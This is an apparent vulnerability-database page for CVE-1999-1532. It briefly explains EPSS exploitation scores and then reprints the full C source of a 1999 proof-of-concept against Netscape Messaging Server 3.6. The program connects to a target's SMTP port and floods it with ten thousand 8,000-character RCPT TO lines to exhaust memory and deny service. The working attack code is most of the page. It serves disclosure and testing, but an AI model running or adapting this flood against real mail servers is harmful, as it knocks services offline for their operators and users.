CVE-1999-1532 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

// source: https://www.securityfocus.com/bid/748/info Netscape Messaging server will not de-allocate memory that is used to store the RCPT TO information for an incoming email. By sending enough long RCPT TO addresses, the system can be forced to consume all available memory, leading to a denial of service. /*************************************************************** You can test "YOUR" Netscape Messaging Server 3.6SP2 for NT whether vulnerable for too much RCPT TO or not. by Nobuo Miwa, LAC Japan 28th Oct. 1999 http://www.lac.co.jp/security/ ****************************************************************/ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #define STR_HELO "HELO rcpt2\n" #define STR_MAILFROM "MAIL FROM:rcpt2\n" #define RCPT2_LENGTH 8000 #define RCPT2_NUMBER 10000 int openSocket(struct sockaddr_in *si, char *hostIPaddr) { int port=25, sd, rt ; long li ; struct hostent *he; si->sin_addr.s_addr = inet_addr(hostIPaddr); si->sin_family = AF_INET; si->sin_port = htons (port); sd = socket (si->sin_family, SOCK_STREAM, 0); if (sd == -1) return (-1); rt = connect(sd,(struct sockaddr *)si,sizeof(struct sockaddr_in)); if ( rt < 0 ) { close(sd); return(-1); } return(sd) ; } void sendRCPT2(int sd) { char rcptStr[RCPT2_LENGTH], tmpStr[RCPT2_LENGTH+80], strn[80]; int rt, i; memset( tmpStr, 0, sizeof(tmpStr) ) ; recv( sd, tmpStr, sizeof(tmpStr), 0 ); printf("%s",tmpStr); printf("%s",STR_HELO); send( sd, STR_HELO, strlen(STR_HELO), 0 ); memset( tmpStr, 0, sizeof(tmpStr) ) ; rt = recv( sd, tmpStr, sizeof(tmpStr), 0 ); if ( rt>0 ) printf("%s",tmpStr); printf("%s",STR_MAILFROM); send(sd, STR_MAILFROM, strlen(STR_MAILFROM), 0); memset( tmpStr, 0, sizeof(tmpStr) ) ; rt = recv(sd, tmpStr, sizeof(tmpStr), 0); if ( rt>0 ) printf("%s",tmpStr); strcpy( rcptStr, "RCPT TO: rcpt2@" ) ; while ( RCPT2_LENGTH-strlen(rcptStr)>10 ) strcat( rcptStr, "aaaaaaaaaa") ; strcat( rcptStr, "\n" ); for ( i=0 ; i<RCPT2_NUMBER ; i++ ) { printf("No.%d RCPT TO:rcpt2@aaa.. len %d\n",i,strlen(rcptStr)); send( sd, rcptStr, strlen(rcptStr), 0 ); rt = recv( sd, tmpStr, sizeof(tmpStr)-1, 0 ); strncpy( strn, tmpStr, 60 ) ; if ( rt>0 ) printf("%s \n",strn); } return; } int main (int argc, char *argv[]) { char hostIPaddr[80], *cc, *pfft; int sd = 0; struct sockaddr_in si; printf("You can use ONLY for YOUR Messaging Server 3.6\n"); if (argc != 2) { printf("Usage: %s IPaddress \n",argv[0]); exit(1); } else strcpy (hostIPaddr, argv[1]); sd = openSocket(&si,hostIPaddr); if (sd < 1) { printf("failed!\n"); exit(-1); } sendRCPT2( sd ); close (sd); exit(0); }